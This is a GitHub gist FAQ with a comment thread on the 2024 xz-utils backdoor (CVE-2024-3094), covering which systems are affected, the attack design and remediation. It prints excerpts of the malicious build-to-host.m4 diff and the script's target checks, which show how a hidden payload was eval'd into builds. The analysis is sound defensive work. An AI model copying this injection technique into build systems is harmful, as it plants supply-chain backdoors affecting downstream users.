Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active January 2, 2025 15:08
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@imelon123
Copy link

imelon123 commented Apr 1, 2024

@thesamesam To be honest, here I'm not really interested in what was committed, but rather about the timezone and timestamps, especially the following one:

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <[email protected]>
Date:   2023-06-27 17:27:09 +0300					--> +300	Jia Tan		2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

I don't think it was a commit triggered from account 'Lasse Collin', as there were no other events at the same timestamp. In that case, it should be from account Jia Tan itself. This raises the question, why did Jia Tan change his timezone to +300?

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer). It's been covered how the time might change to Lasse's when applying a patch from someone else.

EDIT: xry111 rightly points out in https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007558#gistcomment-5007558 that the pusher may be a third person and this isn't represented in git metadata.

@ItzSwirlz
Copy link

@x1done daylight savings?

@xry111
Copy link

xry111 commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer).

Both the author and the committer is Jia Tan:

$ git show 3d1fdddf92321b516d55651888b9c669e254634e --format=fuller | head
commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <[email protected]>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <[email protected]>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

    Docs: Document the configure option --disable-ifunc in INSTALL.

diff --git a/INSTALL b/INSTALL
index 7fb41fa6..b64c56c5 100644

But the person pushed this commit is allowed to be neither author nor committer. (I.e. it may happen that A authored the change, B committed the change, and C pushed the change.)

It's not possible to find the person pushed the commit with git CLI. AFAIK there is some GitHub API to figure out when and who pushed a commit. However the repo is under suspension, and even it's not I still don't know if this approach will work when the GitHub repo is only a mirror.

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

Yes, you're absolutely right. The person who pushed it may be a third person which isn't represented in the commit metadata.

EDIT: I will edit my earlier comment and link to that.

@imelon123
Copy link

imelon123 commented Apr 1, 2024

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

@thesamesam In the scenario (as xry111 has explained) on 2024-02-12, I guess there should be multiple events from both accounts at the same time. However, with this one, there is only a single event at that time.

@AdrianBunk
Copy link

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me).
+0300 is Finnish summer time.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk
Copy link

AdrianBunk commented Apr 1, 2024

@AdrianBunk Thanks. I will reflect on if this should be included. It's hard because I do not want to encourage a witch hunt and it's mentioned in some references I included. If you have a suggestion for how I could include it without it sounding accusatory, then that would be helpful.

EDIT: Maybe I could mention it in the context of when the IFUNC stuff got introduced.

@thesamesam

https://github.com/hansjans162
Some token activity elsewhere around the xz pull request, and then never seen again.

In Debian it was nearly 2 years later not only this one (and only) bug report requesting the upgrade to 5.6.1, a few days earlier this "person" also created a (now blocked) new user in the Debian git that had the same pattern of some token activity in other projects while also pushing the upgrade to 5.6.1 right after creating the account:
https://web.archive.org/web/20240330080632/https://salsa.debian.org/hjansen
https://salsa.debian.org/debian/xz-utils/-/merge_requests/1

Can you find any other traces of this "person"?

(EDIT: restored after mistakenly "Update comment" instead of a new comment for my next one)

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@AdrianBunk The only thing I've seen pointed out is https://marc.info/?w=2&r=1&s=hans+jensen&q=a but when I took a brief look, it looked like they were not the same person. I will of course keep an eye out...

EDIT: Note that xz-devel is not currently on marc, but I believe the marc people want to get it imported. I should also say questions are welcome - feel free to keep throwing them. I can't reply to every single one, especially if they're more.. out there, but yours have been totally fine & worth answering.

@gh-markt
Copy link

gh-markt commented Apr 1, 2024

Has anyone documented how this exploit may be done without systemd?

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@gh-markt I'm going to update the gist on this today, but TL;DR: all suggested paths I've seen wouldn't work AFAIK because they rely on PAM modules which load too late.

(Of course, if the payload were different, that would be another story, but talking about what we have.)

@AdrianBunk
Copy link

Immediately after 5.6.1 was due to the pushing by "Hans Jansen " in Debian unstable, "Jia Tan" requested a freeze exception in Ubuntu so that it gets into the upcoming LTS (that should be released later this month):
https://tracker.debian.org/news/1515323/accepted-xz-utils-561-1-source-into-unstable/
https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417

@makotom
Copy link

makotom commented Apr 1, 2024

In case this makes any bit of help somehow: https://twitter.com/m61k/status/1774614747553620478
tl;dr - I didn't see the if clause (pasting it below for convenience) as a clue that it targets only glibc-based systems on AMD64, unlike the explanation in the Design section.

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

Apologies if it's a false alarm!

@Artoria2e5
Copy link

Artoria2e5 commented Apr 1, 2024

@makotom Hm. Indeed. The build variable is extracted through eval $(grep ^build=\'x86_64 config.status) (backticks replaced with $(), because i can't markdown), so we should ask autoconf about it.

In autoconf, build is what the --build option eventually gets set to (check general.m4, there's a bit that says build=$build_alias later). The --build option is "the machine you are building on", defaulting to whatever config.guess finds.


now the if line. let's replace the grep with just (true) and (false), so we can find that the expression is the same as

if (! (something ^x86_64)) && (something linux-gnu$); then

There is an illusion of choice here: recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64. so we have three possibilities:

  1. build is not set, because build machine is not x86_64. both parts are false, so true && false is false... no exit.
  2. build is x86_64somethinglinux-gnu. first part is true, second part is true. with negation, we get false && true... no exit.
  3. build is x86_64, but does not end with linux-gnu. first true, second false, exit.

... what? none of this makes sense. Considering the bad version of the crc code is supposed to be only x86_64, we should have seen loads of issues when people compile on a non-x64 machine. or when they cross compile. Maybe something else down the line prevents the wrong-architecture object from being linked?


Yikes, we have two scripts in one, the top-level if and the elif. The if is the part that does things to the Makefile, the elif is the part that does stuff to objects.

Maybe the $CC invocation will detect the architecture mismatch, and 2>/dev/null successfully handles it, so there's no issue with cross compile? (Would still go bonkers at runtime for when host is either (x64 && glibc) or (non-x64), target is (x64 && !glibc), but that's probably too rare.)

I don't know.

@imelon123
Copy link

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker. --> Are we confident your theory can explain the following? "Jia Tan" authored with a +0300 timezone and "Jia Tan" committed with a +0800 timezone? Note - it was commited by account "Jia Tan" with +0800 timezone, not Lasse with +300 timezone.

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <[email protected]>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <[email protected]>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

@viccie30
Copy link

viccie30 commented Apr 1, 2024

Lennart Poettering's remarks about libselinux linking liblzma are apparently true, but that dependency is apparently an error: https://www.openwall.com/lists/oss-security/2024/03/31/12

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@viccie30 Someone else has just pointed this out to me - thanks to both of you. I'll update things shortly.

Really pleased to have this clarification, as it made little sense to me until now, as I couldn't find a trace of liblzma/xz in libselinux (I only grepped the latest tarball & used gh search though, didn't go so far as cloning their repo and grepping history). It was on my list to look into.

@viccie30
Copy link

viccie30 commented Apr 1, 2024

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.
It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker. --> Are we confident your theory can explain the following? "Jia Tan" authored with a +0300 timezone and "Jia Tan" committed with a +0800 timezone? Note - it was commited by account "Jia Tan" with +0800 timezone, not Lasse with +300 timezone.

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <[email protected]>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <[email protected]>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

Anyone can put whatever name, date, or message they want in a commit. I can push a commit made 2 years in the future in a different timezone authored by Henry Kissinger and committed 3 years ago by Pol Pot if I want to.

@AdrianBunk
Copy link

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.
It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

@x1done Everyone in this discussion except you agrees that this is not suspicious, why are you wating everyones time by spamming this thread with repeating the same again and again and again and again?

@imelon123
Copy link

Anyone can put whatever name, date, or message they want in a commit. I can push a commit made 2 years in the future in a different timezone authored by Henry Kissinger and committed 3 years ago by Pol Pot if I want to.

@viccie30 good, technically one can. but then what's the point Jia Tan deliberately changing his timezone to +300 before his commit? It doesn't make sense to me, especially considering that he was using +800 most of the time.

@AdrianBunk
Copy link

@viccie30 good, technically one can. but then what's the point Jia Tan deliberately changing his timezone to +300 before his commit? It doesn't make sense to me, especially considering that he was using +800 most of the time.

@x1done This has already been explained to you multiple times.

Everyone else in this thread would really appreciate if you could just shut up.

@cwegener
Copy link

cwegener commented Apr 1, 2024 via email

@redcode
Copy link

redcode commented Apr 1, 2024

The AuthorDate is supposed to be the original date the commit was created, which is usually equal to CommitDate unless you do an amend, force push or rebase, right? So, if the weird timezone was in CommitDate we could conclude that one of those things has happened. The problem is that the one with the suspicious timezone is AuthorDate, that is, the original one, the one that supposedly reflects when Jia Tan created the commit. Am I wrong?

@redcode
Copy link

redcode commented Apr 1, 2024

It looks suspicious to me at the very least. It looks like evidence that Jia Tan was actually located at a +3 zone, not +8, and that he created that commit with his real timezone (maybe he forgot to use --date to alter the date, or maybe he used another computer or user account where he would have the correct timezone). Something might have happened with that commit, and he tried to fix it, this time using the fake time zone.

@AdrianBunk
Copy link

@redcode Please stop trying to restart discussing a topic that has already been discussed far too long.

Please read https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007548#gistcomment-5007548 and other posts in this thread that explain why this is not suspicious.

@duracell
Copy link

duracell commented Apr 1, 2024

It looks suspicious to me at the very least.

Or it's the thing others already posted. Which is much more likely, because it's exactly what happens if you do rebase or other things, which fits perfectly in the complete process. So if there is no evidence for anything, why would you bring this up? (It's a rhetorical question, please do NOT answer!)

@redcode
Copy link

redcode commented Apr 1, 2024

@redcode Please stop trying to restart discussing a topic that has already been discussed far too long.

Please read https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007548#gistcomment-5007548 and other posts in this thread that explain why this is not suspicious.

Have you tried what you have posted? because --ignore-date should fake AuthorDate by setting it to CommitDate. Or at least that's what the documentation says.

And why this insistence on not taking into account this issue? It seems completely normal to me that a hacker would try to fake the time zone. BTW, I am NOT accusing Lasse Collin of being Jia Tan.

@AdrianBunk
Copy link

Have you tried what you have posted?

Yes.

Feel free to try yourself, but please stop posting.

@redcode
Copy link

redcode commented Apr 1, 2024

Have you tried what you have posted?

Yes.

Feel free to try yourself, but please stop posting.

OK, I've done it, using 2 machines. The 1st one with GMT+0, and the 2nd one with GMT+2, where I've applied the patches with git am. And, as the documentation says, AuthorDate has been replaced by CommitDate:

imagen

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment